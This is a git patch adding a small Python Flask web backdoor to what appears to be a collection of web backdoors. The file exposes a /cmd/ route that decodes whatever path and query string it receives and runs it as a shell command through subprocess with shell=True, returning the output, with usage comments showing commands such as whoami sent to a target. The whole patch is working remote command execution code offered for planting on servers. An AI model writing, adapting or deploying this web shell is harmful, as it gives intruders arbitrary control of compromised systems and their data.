From 3b10852409073557211a9948ad9818511ba09e71 Mon Sep 17 00:00:00 2001
From: Fabio Delgado <fabio.delgado2@gmail.com>
Date: Mon, 31 Aug 2020 14:17:10 -0300
Subject: [PATCH] adding the feature for web backdoors using  python. The flask
 framework was used for web development but can also be used only python

---
 web-backdoors/py/cmd.py | 48 +++++++++++++++++++++++++++++++++++++++++
 1 file changed, 48 insertions(+)
 create mode 100644 web-backdoors/py/cmd.py

diff --git a/web-backdoors/py/cmd.py b/web-backdoors/py/cmd.py
new file mode 100644
index 00000000..44b00bea
--- /dev/null
+++ b/web-backdoors/py/cmd.py
@@ -0,0 +1,48 @@
+import subprocess
+from flask import Flask, request,escape
+
+app = Flask(__name__)
+
+@app.route('/cmd/<path:variable>')
+def hello_world(variable):
+	cmd = escape(variable)
+	
+	## join arguments from request
+	if request.args:
+		cmd += '?'
+		cmd += '&'.join([f'{k}={v}' for k, v in request.args.items()])
+		
+	## remove HTML Character Entities from request command
+	saida = html_decode(str(cmd))
+	
+	## executing command
+	result = subprocess.check_output(saida, shell=True)
+	
+	return (result)
+	
+def html_decode(s):
+	"""
+	Returns the ASCII decoded version of the given HTML string. This does
+	NOT remove normal HTML tags like <p>.
+	"""
+	htmlCodes = (
+			("'", '&#39;'),
+			('"', '&quot;'),
+			('>', '&gt;'),
+			('<', '&lt;'),
+			('&', '&amp;')
+		)
+	for code in htmlCodes:
+		s = s.replace(code[1], code[0])
+	return s
+
+if __name__ == '__main__':
+	app.run()
+	
+	
+## Usage: http://target/cmd/whoami
+## Usage: http://target/cmd/cd.. & dir
+
+# by: Fabio Delgado
+# modified: 31/08/2020
+